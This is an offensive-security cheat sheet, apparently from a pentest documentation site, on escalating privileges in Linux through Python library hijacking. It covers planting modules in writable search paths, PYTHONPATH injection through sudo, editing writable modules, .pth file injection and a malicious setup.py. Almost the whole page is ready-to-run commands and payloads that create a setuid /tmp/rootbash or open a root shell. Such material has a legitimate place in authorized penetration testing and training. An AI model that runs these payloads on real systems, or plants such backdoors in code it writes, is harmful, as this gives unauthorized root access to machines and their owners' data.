> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Python Library Hijacking

> Privilege escalation via Python library hijacking: module search order abuse, writable paths, and PYTHONPATH injection.

## Overview

If a script runs as root and imports a Python module, you can hijack that import by placing a malicious module earlier in the search path.

***

## Python Module Search Order

```
1. Current directory of the script
2. PYTHONPATH environment variable
3. Default installation paths (/usr/lib/python3/dist-packages, etc.)
```

Check search path:

```bash theme={"dark"}
python3 -c 'import sys; print("\n".join(sys.path))'
```

***

## Find Target Scripts

### Scripts Running as Root

```bash theme={"dark"}
# pspy
./pspy64 | grep python

# crontab
cat /etc/crontab | grep python
crontab -l | grep python

# systemd
grep -r "python" /etc/systemd/system/ 2>/dev/null
```

### Check Imports

```bash theme={"dark"}
cat /opt/script.py | grep import
```

***

## Same Directory Hijack

If root script at `/opt/script.py` imports `utils`:

```python theme={"dark"}
# /opt/script.py
import utils
utils.backup()
```

And `/opt/` is writable:

```bash theme={"dark"}
ls -la /opt/
```

Create malicious module:

```python theme={"dark"}
# /opt/utils.py
import os
os.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")
```

Wait for execution → `/tmp/rootbash -p`.

***

## Writable Library Path

Check if any directory in Python path is writable:

```bash theme={"dark"}
python3 -c 'import sys; print("\n".join(sys.path))' | while read p; do [ -w "$p" ] && echo "WRITABLE: $p"; done
```

```bash theme={"dark"}
find /usr/lib/python3* -writable -type d 2>/dev/null
find /usr/local/lib/python3* -writable -type d 2>/dev/null
```

If writable → drop malicious module with same name as imported module:

```bash theme={"dark"}
echo 'import os; os.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")' > /usr/lib/python3/dist-packages/target_module.py
```

***

## PYTHONPATH Injection

If sudo preserves PYTHONPATH:

```bash theme={"dark"}
sudo -l
# (root) NOPASSWD: /usr/bin/python3 /opt/script.py
# env_keep+=PYTHONPATH
```

Create hijack module:

```python theme={"dark"}
# /tmp/hijack/importedmodule.py
import os
os.system("/bin/bash")
```

```bash theme={"dark"}
sudo PYTHONPATH=/tmp/hijack /usr/bin/python3 /opt/script.py
```

***

## Writable .py File (Direct Edit)

If the imported module itself is writable:

```bash theme={"dark"}
ls -la /usr/lib/python3/dist-packages/used_module.py
```

Inject at the top:

```bash theme={"dark"}
echo -e 'import os\nos.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")\n' | cat - /usr/lib/python3/dist-packages/used_module.py > /tmp/mod.py && mv /tmp/mod.py /usr/lib/python3/dist-packages/used_module.py
```

***

## .pth File Injection

`.pth` files in site-packages directories add paths to `sys.path`. Lines starting with `import` are executed.

Check if writable:

```bash theme={"dark"}
find /usr/lib/python3* -name "*.pth" -writable 2>/dev/null
ls -la /usr/lib/python3/dist-packages/*.pth
```

If writable dir exists, create:

```bash theme={"dark"}
echo 'import os; os.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")' > /usr/lib/python3/dist-packages/evil.pth
```

Executes on any Python invocation.

***

## pip Install Hijack

If user can run `pip install` as root or root runs pip automatically:

### Malicious setup.py

```python theme={"dark"}
from setuptools import setup
import os

os.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash")

setup(
    name="legit-package",
    version="1.0",
)
```

```bash theme={"dark"}
sudo pip install .
```

***

## Quick Reference

| Scenario                     | Technique                          |
| ---------------------------- | ---------------------------------- |
| Script directory writable    | Drop module in same dir            |
| Python lib path writable     | Drop module in lib path            |
| PYTHONPATH preserved in sudo | Set PYTHONPATH to hijack dir       |
| .pth file writable           | Inject `import os; os.system(...)` |
| pip as root                  | Malicious setup.py                 |
